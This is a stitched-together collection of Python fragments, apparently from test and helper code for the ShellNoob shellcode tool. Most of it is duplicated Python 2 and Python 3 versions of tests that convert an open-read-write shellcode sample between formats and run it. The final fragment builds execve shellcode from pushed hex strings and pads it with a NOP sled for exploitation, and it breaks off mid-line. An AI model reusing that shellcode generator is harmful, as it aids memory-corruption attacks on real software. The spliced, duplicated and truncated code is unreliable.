def test_get_start_address():
stdout, stderr = '', ''
tmp_dir = mkdtemp()
asm_fp = join(tmp_dir, 'shellcode.asm')
exe_fp = join(tmp_dir, 'shellcode.exe')
os.system('echo "%s" > /tmp/secret' % SECRET_STR)
kernel = ShellNoob.get_kernel()
if kernel == 'Linux':
shutil.copyfile(join(dirname(__file__), 'samples/x86-linux/open-read-write.asm'), asm_fp)
elif kernel == 'FreeBSD':
shutil.copyfile(join(dirname(__file__), 'samples/x86-freebsd/open-read-write.asm'), asm_fp)
else:
raise Exception('testing on kernel %s not supported' % kernel)
_out, _err, _val = run_with_args('%s --to-exe' % asm_fp)
stdout += _out; stderr += _err; assert _val == 0;
snoob = ShellNoob()
start_addr = snoob.get_start_address(exe_fp)
assert re.match('0x[0-9a-f]+', start_addr)
return stdout, stderr, 0
def test_get_start_address():
stdout, stderr = '', ''
tmp_dir = mkdtemp()
asm_fp = join(tmp_dir, 'shellcode.asm')
exe_fp = join(tmp_dir, 'shellcode.exe')
secret_fp = '/tmp/secret'
os.system('echo "%s" > %s' % (SECRET_STR, secret_fp))
kernel = ShellNoob.get_kernel()
if kernel == 'Linux':
shutil.copyfile(
join(dirname(__file__), 'samples/x86-linux/open-read-write.asm'),
asm_fp)
elif kernel == 'FreeBSD':
shutil.copyfile(
join(dirname(__file__), 'samples/x86-freebsd/open-read-write.asm'),
asm_fp)
else:
raise Exception('testing on kernel %s not supported' % kernel)
_out, _err, _val = run_with_args('%s --to-exe' % asm_fp)
stdout += _out
stderr += _err
assert _val == 0
snoob = ShellNoob()
start_addr = snoob.get_start_address(exe_fp)
assert re.match('0x[0-9a-f]+', start_addr)
shutil.rmtree(tmp_dir)
os.unlink(secret_fp)
return stdout, stderr, 0
def run_all_tests():
kernel, hardware = ShellNoob.get_kernel(), ShellNoob.get_hardware()
entry = '%s#%s' % (kernel, hardware)
tot_test = 0
ok_test = 0
try:
tests = supported_features[entry]
except KeyError:
print('ERROR: No tests for this setup "%s"' % entry)
sys.exit(1)
for test_name, entries in tests.items():
for e in entries:
tot_test += 1
_input, expected = e
print('Running test %s - %s - %s' %
(test_name, _input, str(expected)))
e_stdout, e_stderr, e_retval = expected
try:
stdout, stderr, retval = globals()[test_name](*_input)
if not re.search(e_stdout, stdout):
print(RED + 'ERROR STDOUT %s != %s (expected)' %
(stdout, e_stdout) + ENDC)
continue
if not re.search(e_stderr, stderr):
print(RED + 'ERROR STDERR?g %s != %s (expected)' %
(stderr, e_stderr) + ENDC)
continue
if retval != e_retval:
print(RED + 'ERROR RETVAL %s != %s (expected)' %
(retval, e_retval) + ENDC)
continue
print(GREEN + 'OK' + ENDC)
ok_test += 1
except Exception as e:
print(RED + 'ERROR Exception while executing %s' % test_name +
ENDC)
print(traceback.format_exc())
print('---------------------------')
if ok_test == tot_test:
print(GREEN + '%s/%s OK' % (ok_test, tot_test) + ENDC)
else:
print(RED + '%s/%s ERROR' % (ok_test, tot_test) + ENDC)
def main(argv):
"""Main method."""
args = parser.parse_args(argv[1:])
snoob = ShellNoob(args.is_64, args.intel)
hexcode = extract_hex_code(snoob, args.fmt, args.fp)
hexdump = hex_dump(hexcode)
print_hex_dump(hexdump)
inss = prohibited_bytes_analysis(
snoob, hexcode, args.blacklist, args.whitelist)
print_prohibited_bytes_analysis(inss)
def run_all_tests():
kernel, hardware = ShellNoob.get_kernel(), ShellNoob.get_hardware()
entry = '%s#%s' % (kernel, hardware)
tot_test = 0
ok_test = 0
try:
tests = supported_features[entry]
except KeyError:
print 'ERROR: No tests for this setup "%s"' % entry
sys.exit(1)
for test_name, entries in tests.items():
for e in entries:
tot_test += 1
_input, expected = e
print 'Running test %s - %s - %s' % (test_name, _input, str(expected))
e_stdout, e_stderr, e_retval = expected
try:
stdout, stderr, retval = globals()[test_name](*_input)
if not re.search(e_stdout, stdout):
print RED + 'ERROR STDOUT %s != %s (expected)' % (stdout, e_stdout) + ENDC
continue
if not re.search(e_stderr, stderr):
print RED + 'ERROR STDERR?g %s != %s (expected)' % (stderr, e_stderr) + ENDC
continue
if retval != e_retval:
print RED + 'ERROR RETVAL %s != %s (expected)' % (retval, e_retval) + ENDC
continue
print GREEN + 'OK' + ENDC
ok_test += 1
except Exception as e:
print RED + 'ERROR Exception while executing %s' % test_name + ENDC
print traceback.format_exc()
print '---------------------------'
if ok_test == tot_test:
print GREEN + '%s/%s OK' % (ok_test, tot_test) + ENDC
else:
print RED + '%s/%s ERROR' % (ok_test, tot_test) + ENDC
def test_conversion(with_breakpoint=False):
stdout, stderr = '', ''
tmp_dir = mkdtemp()
asm_fp = join(tmp_dir, 'shellcode.asm')
asm2_fp = join(tmp_dir, 'shellcode2.asm')
obj_fp = join(tmp_dir, 'shellcode.obj')
exe_fp = join(tmp_dir, 'shellcode.exe')
bin_fp = join(tmp_dir, 'shellcode.bin')
bin2_fp = join(tmp_dir, 'shellcode2.bin')
hex_fp = join(tmp_dir, 'shellcode.hex')
c_fp = join(tmp_dir, 'shellcode.c')
python_fp = join(tmp_dir, 'shellcode.py')
bash_fp = join(tmp_dir, 'shellcode.sh')
pretty_fp = join(tmp_dir, 'shellcode.pretty')
safeasm_fp = join(tmp_dir, 'shellcode.safeasm')
secret_fp = '/tmp/secret'
os.system('echo "%s" > %s' % (SECRET_STR, secret_fp))
kernel = ShellNoob.get_kernel()
if kernel == 'Linux':
shutil.copyfile(
join(dirname(__file__), 'samples/x86-linux/open-read-write.asm'),
asm_fp)
elif kernel == 'FreeBSD':
shutil.copyfile(
join(dirname(__file__), 'samples/x86-freebsd/open-read-write.asm'),
asm_fp)
else:
raise Exception('testing on kernel %s not supported' % kernel)
_out, _err, _val = run_with_args('%s --to-bin' % asm_fp)
stdout += _out
stderr += _err
assert _val == 0
_out, _err, _val = run_with_args('%s --to-hex' % bin_fp)
stdout += _out
stderr += _err
assert _val == 0
_out, _err, _val = run_with_args('%s --to-obj' % hex_fp)
stdout += _out
stderr += _err
assert _val == 0
_out, _err, _val = run_with_args('%s --to-hex' % obj_fp)
stdout += _out
stderr += _err
assert _val == 0
_out, _err, _val = run_with_args('%s --to-bin %s' % (hex_fp, bin2_fp))
stdout += _out
stderr += _err
assert _val == 0
assert (md5(open(bin_fp, 'rb').read()).hexdigest() == md5(
open(bin2_fp, 'rb').read()).hexdigest())
_out, _err, _val = run_with_args('%s --to-obj' % asm_fp)
stdout += _out
stderr += _err
assert _val == 0
_out, _err, _val = run_with_args('%s --to-exe' % asm_fp)
stdout += _out
stderr += _err
assert _val == 0
_out, _err, _val = run_with_args('%s --to-bin' % asm_fp)
stdout += _out
stderr += _err
assert _val == 0
_out, _err, _val = run_with_args('%s --to-hex' % asm_fp)
stdout += _out
stderr += _err
assert _val == 0
_out, _err, _val = run_with_args('%s --to-c' % asm_fp)
stdout += _out
stderr += _err
assert _val == 0
_out, _err, _val = run_with_args('%s --to-python' % asm_fp)
stdout += _out
stderr += _err
assert _val == 0
_out, _err, _val = run_with_args('%s --to-bash' % asm_fp)
stdout += _out
stderr += _err
assert _val == 0
_out, _err, _val = run_with_args('%s --to-pretty' % asm_fp)
stdout += _out
stderr += _err
assert _val == 0
_out, _err, _val = run_with_args('%s --to-safeasm' % asm_fp)
stdout += _out
stderr += _err
assert _val == 0
_out, _err, _val = run_with_args('%s --to-asm %s' % (obj_fp, asm2_fp))
stdout += _out
stderr += _err
assert _val == 0
_out, _err, _val = run_with_args('%s --to-exe' % obj_fp)
stdout += _out
stderr += _err
assert _val == 0
_out, _err, _val = run_with_args('%s --to-bin' % obj_fp)
stdout += _out
stderr += _err
assert _val == 0
_out, _err, _val = run_with_args('%s --to-hex' % obj_fp)
stdout += _out
stderr += _err
assert _val == 0
_out, _err, _val = run_with_args('%s --to-c' % obj_fp)
stdout += _out
stderr += _err
assert _val == 0
_out, _err, _val = run_with_args('%s --to-python' % obj_fp)
stdout += _out
stderr += _err
assert _val == 0
_out, _err, _val = run_with_args('%s --to-bash' % obj_fp)
stdout += _out
stderr += _err
assert _val == 0
_out, _err, _val = run_with_args('%s --to-pretty' % obj_fp)
stdout += _out
stderr += _err
assert _val == 0
_out, _err, _val = run_with_args('%s --to-safeasm' % obj_fp)
stdout += _out
stderr += _err
assert _val == 0
_out, _err, _val = run_with_args('-c %s --to-obj' % asm_fp)
stdout += _out
stderr += _err
assert _val == 0
_out, _err, _val = run_with_args('-c %s --to-exe' % asm_fp)
stdout += _out
stderr += _err
assert _val == 0
_out, _err, _val = run_with_args('-c %s --to-bin' % asm_fp)
stdout += _out
stderr += _err
assert _val == 0
_out, _err, _val = run_with_args('-c %s --to-hex' % asm_fp)
stdout += _out
stderr += _err
assert _val == 0
_out, _err, _val = run_with_args('-c %s --to-c' % asm_fp)
stdout += _out
stderr += _err
assert _val == 0
_out, _err, _val = run_with_args('-c %s --to-python' % asm_fp)
stdout += _out
stderr += _err
assert _val == 0
_out, _err, _val = run_with_args('-c %s --to-bash' % asm_fp)
stdout += _out
stderr += _err
assert _val == 0
_out, _err, _val = run_with_args('-c %s --to-pretty' % asm_fp)
stdout += _out
stderr += _err
assert _val == 0
_out, _err, _val = run_with_args('-c %s --to-safeasm' % asm_fp)
stdout += _out
stderr += _err
assert _val == 0
# TODO add "chain" tests
_out, _err, _val = run_with_args('%s --to-exe' % asm_fp)
assert os.popen(exe_fp).read().rstrip() == SECRET_STR
print('Output of the shellcode matches!')
shutil.rmtree(tmp_dir)
os.unlink(secret_fp)
return stdout.strip(), stderr, 0
def test_conversion(with_breakpoint=False):
stdout, stderr = '', ''
tmp_dir = mkdtemp()
asm_fp = join(tmp_dir, 'shellcode.asm')
asm2_fp = join(tmp_dir, 'shellcode2.asm')
obj_fp = join(tmp_dir, 'shellcode.obj')
exe_fp = join(tmp_dir, 'shellcode.exe')
bin_fp = join(tmp_dir, 'shellcode.bin')
bin2_fp = join(tmp_dir, 'shellcode2.bin')
hex_fp = join(tmp_dir, 'shellcode.hex')
c_fp = join(tmp_dir, 'shellcode.c')
python_fp = join(tmp_dir, 'shellcode.py')
bash_fp = join(tmp_dir, 'shellcode.sh')
pretty_fp = join(tmp_dir, 'shellcode.pretty')
safeasm_fp = join(tmp_dir, 'shellcode.safeasm')
os.system('echo "%s" > /tmp/secret' % SECRET_STR)
kernel = ShellNoob.get_kernel()
if kernel == 'Linux':
shutil.copyfile(join(dirname(__file__), 'samples/x86-linux/open-read-write.asm'), asm_fp)
elif kernel == 'FreeBSD':
shutil.copyfile(join(dirname(__file__), 'samples/x86-freebsd/open-read-write.asm'), asm_fp)
else:
raise Exception('testing on kernel %s not supported' % kernel)
_out, _err, _val = run_with_args('%s --to-bin' % asm_fp)
stdout += _out; stderr += _err; assert _val == 0;
_out, _err, _val = run_with_args('%s --to-hex' % bin_fp)
stdout += _out; stderr += _err; assert _val == 0;
_out, _err, _val = run_with_args('%s --to-obj' % hex_fp)
stdout += _out; stderr += _err; assert _val == 0;
_out, _err, _val = run_with_args('%s --to-hex' % obj_fp)
stdout += _out; stderr += _err; assert _val == 0;
_out, _err, _val = run_with_args('%s --to-bin %s' % (hex_fp, bin2_fp))
stdout += _out; stderr += _err; assert _val == 0;
assert (md5(open(bin_fp,'rb').read()).hexdigest() ==
md5(open(bin2_fp,'rb').read()).hexdigest())
_out, _err, _val = run_with_args('%s --to-obj' % asm_fp)
stdout += _out; stderr += _err; assert _val == 0;
_out, _err, _val = run_with_args('%s --to-exe' % asm_fp)
stdout += _out; stderr += _err; assert _val == 0;
_out, _err, _val = run_with_args('%s --to-bin' % asm_fp)
stdout += _out; stderr += _err; assert _val == 0;
_out, _err, _val = run_with_args('%s --to-hex' % asm_fp)
stdout += _out; stderr += _err; assert _val == 0;
_out, _err, _val = run_with_args('%s --to-c' % asm_fp)
stdout += _out; stderr += _err; assert _val == 0;
_out, _err, _val = run_with_args('%s --to-python' % asm_fp)
stdout += _out; stderr += _err; assert _val == 0;
_out, _err, _val = run_with_args('%s --to-bash' % asm_fp)
stdout += _out; stderr += _err; assert _val == 0;
_out, _err, _val = run_with_args('%s --to-pretty' % asm_fp)
stdout += _out; stderr += _err; assert _val == 0;
_out, _err, _val = run_with_args('%s --to-safeasm' % asm_fp)
stdout += _out; stderr += _err; assert _val == 0;
_out, _err, _val = run_with_args('%s --to-asm %s' % (obj_fp, asm2_fp))
stdout += _out; stderr += _err; assert _val == 0;
_out, _err, _val = run_with_args('%s --to-exe' % obj_fp)
stdout += _out; stderr += _err; assert _val == 0;
_out, _err, _val = run_with_args('%s --to-bin' % obj_fp)
stdout += _out; stderr += _err; assert _val == 0;
_out, _err, _val = run_with_args('%s --to-hex' % obj_fp)
stdout += _out; stderr += _err; assert _val == 0;
_out, _err, _val = run_with_args('%s --to-c' % obj_fp)
stdout += _out; stderr += _err; assert _val == 0;
_out, _err, _val = run_with_args('%s --to-python' % obj_fp)
stdout += _out; stderr += _err; assert _val == 0;
_out, _err, _val = run_with_args('%s --to-bash' % obj_fp)
stdout += _out; stderr += _err; assert _val == 0;
_out, _err, _val = run_with_args('%s --to-pretty' % obj_fp)
stdout += _out; stderr += _err; assert _val == 0;
_out, _err, _val = run_with_args('%s --to-safeasm' % obj_fp)
stdout += _out; stderr += _err; assert _val == 0;
_out, _err, _val = run_with_args('-c %s --to-obj' % asm_fp)
stdout += _out; stderr += _err; assert _val == 0;
_out, _err, _val = run_with_args('-c %s --to-exe' % asm_fp)
stdout += _out; stderr += _err; assert _val == 0;
_out, _err, _val = run_with_args('-c %s --to-bin' % asm_fp)
stdout += _out; stderr += _err; assert _val == 0;
_out, _err, _val = run_with_args('-c %s --to-hex' % asm_fp)
stdout += _out; stderr += _err; assert _val == 0;
_out, _err, _val = run_with_args('-c %s --to-c' % asm_fp)
stdout += _out; stderr += _err; assert _val == 0;
_out, _err, _val = run_with_args('-c %s --to-python' % asm_fp)
stdout += _out; stderr += _err; assert _val == 0;
_out, _err, _val = run_with_args('-c %s --to-bash' % asm_fp)
stdout += _out; stderr += _err; assert _val == 0;
_out, _err, _val = run_with_args('-c %s --to-pretty' % asm_fp)
stdout += _out; stderr += _err; assert _val == 0;
_out, _err, _val = run_with_args('-c %s --to-safeasm' % asm_fp)
stdout += _out; stderr += _err; assert _val == 0;
# TODO add "chain" tests
_out, _err, _val = run_with_args('%s --to-exe' % asm_fp)
assert os.popen(exe_fp).read().rstrip() == SECRET_STR
print 'Output of the shellcode matches!'
shutil.rmtree(tmp_dir)
return stdout, stderr, 0
for count in range(len(hex_code)):
if count > 0 and count % 8 == 0:
final_str += "push $0x%s \n" % str
str = ""
str += hex_code[count]
final_str += "push $0x%s \n" % str
shell_code += final_str + "movl %esp,%ebx\npush %eax\n" \
"push %ebx\nmov %esp, %ecx\nmovl %eax, %edx\nmov $11,%al\nint $0x80\nxor %eax,%eax\nmov $1,%al" \
"\nxor %ebx,%ebx\nint $0x80".encode("utf-8")
# output_file = open("shell.asm", "w")
# output_file.write(shell_code)
# output_file.close()
sn = ShellNoob(flag_intel=False)
hex_code = sn.asm_to_hex(shell_code)
hc = "\\x"
for i in range(0, len(hex_code)):
if i > 0 and i % 2 is 0:
hc += "\\x"
hc += hex_code[i]
diff = to_range - from_range - hc.count('x')
for i in range(0, 6):
hc = i * "\\x90" + (diff / 2 * "\\x90") + hc + (diff / 2 *
argv[2].decode())
